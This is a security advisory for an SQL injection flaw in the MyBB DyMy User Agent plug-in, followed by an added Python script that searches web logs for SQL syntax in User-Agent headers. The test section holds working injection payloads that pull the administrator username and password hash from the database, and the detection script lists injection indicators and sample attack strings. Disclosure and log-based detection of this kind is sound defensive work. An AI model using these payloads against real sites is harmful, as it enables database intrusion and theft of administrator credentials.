Release date:
Updated on:
Affected Systems:
MyBB dymy-user-agent
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56931
The DyMy User Agent plug-in places small browser and OS badges in posts, based on the User-Agent string.
The MyBB DyMy User Agent plug-in (newreply.php) does not properly filter the User-Agent field supplied by users, which results in an SQL injection vulnerability. Remote attackers can exploit this vulnerability to perform unauthorized database operations.
<* Source: JoinSe7en
Link: http://www.exploit-db.com/exploits/23359/
http://osvdb.org/88439
http://secunia.com/advisories/51565/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
Get administrator username:
POST http://localhost/mybb/newreply.php?ajax=1
HTTP Headers:
Host: localhost
User-Agent: 'and (select 1 from (select count (*), concat (select username from mybb_users where uid = 1), floor (Rand (0) * 2 )) a from information_schema.tables group by a) B ));#
Output:
SQL Error:
1062 - Duplicate entry 'admin1' for key 'group_key'
Obtain the administrator password:
POST http://localhost/mybb/newreply.php?ajax=1
HTTP Headers:
Host: localhost
User-Agent: 'and (select 1 from (select count (*), concat (select password from mybb_users where uid = 1), floor (Rand (0) * 2 )) a from information_schema.tables group by a) B ));#
Output:
SQL Error:
1062 - Duplicate entry '098f6bcd4621d373cade4e832627b4f6' for key 'group_key'
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
MyBB
----
Currently, the vendor has not provided a patch or an upgrade. We recommend that users of this software watch the vendor's homepage for the latest version:
http://mods.mybb.com/view/dymy-user-agent
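
Because no vendor patch is available, reviewing web server logs for SQL syntax in the User-Agent header of requests to newreply.php is one way to spot attempts against this plug-in. The script below is an added example, not part of the original advisory or the plug-in. It assumes Apache/nginx combined log format; the indicator list, the threshold of two indicators and the sample log lines are constructed for illustration.

```python
import re

# Combined Log Format:
# ip ident user [time] "METHOD path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?:[^"\\]|\\.)*" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Heuristic indicators of SQL syntax inside a User-Agent value (assumed list).
SQL_INDICATORS = {
    "quote": re.compile(r"'"),
    "subselect": re.compile(r"\bselect\b.+\bfrom\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "floor_rand": re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I),
    "concat": re.compile(r"\bconcat\s*\(", re.I),
    "trailing_comment": re.compile(r"(#|--\s)\s*$"),
}

def score_user_agent(ua):
    """Return the sorted names of all indicators found in a User-Agent."""
    return sorted(name for name, rx in SQL_INDICATORS.items() if rx.search(ua))

def suspicious_requests(lines, path_hint="newreply.php", threshold=2):
    """Flag requests to path_hint whose User-Agent hits >= threshold indicators."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or path_hint not in m["path"]:
            continue  # unparseable line, or a different script
        hits = score_user_agent(m["ua"])
        if len(hits) >= threshold:  # one stray apostrophe alone is not enough
            findings.append({"ip": m["ip"], "path": m["path"],
                             "status": m["status"], "indicators": hits})
    return findings

# Constructed sample log; the injected User-Agent is abbreviated with "...".
SAMPLE_LOG = """
198.51.100.23 - - [01/Jan/2013:10:15:02 +0000] "POST /mybb/newreply.php?ajax=1 HTTP/1.1" 200 512 "-" "' and (select 1 from (select count(*), concat(...), floor(rand(0)*2)) a from information_schema.tables group by a) b)#"
192.0.2.10 - - [01/Jan/2013:10:16:40 +0000] "POST /mybb/newreply.php?ajax=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
192.0.2.11 - - [01/Jan/2013:10:17:05 +0000] "POST /mybb/newreply.php?ajax=1 HTTP/1.1" 200 2048 "-" "Bob's Feed Reader/1.0"
198.51.100.23 - - [01/Jan/2013:10:18:11 +0000] "GET /mybb/index.php HTTP/1.1" 200 900 "-" "x' and (select 1 from information_schema.tables)#"
""".strip().splitlines()

if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```

Pass path_hint="" to check every logged request rather than only newreply.php.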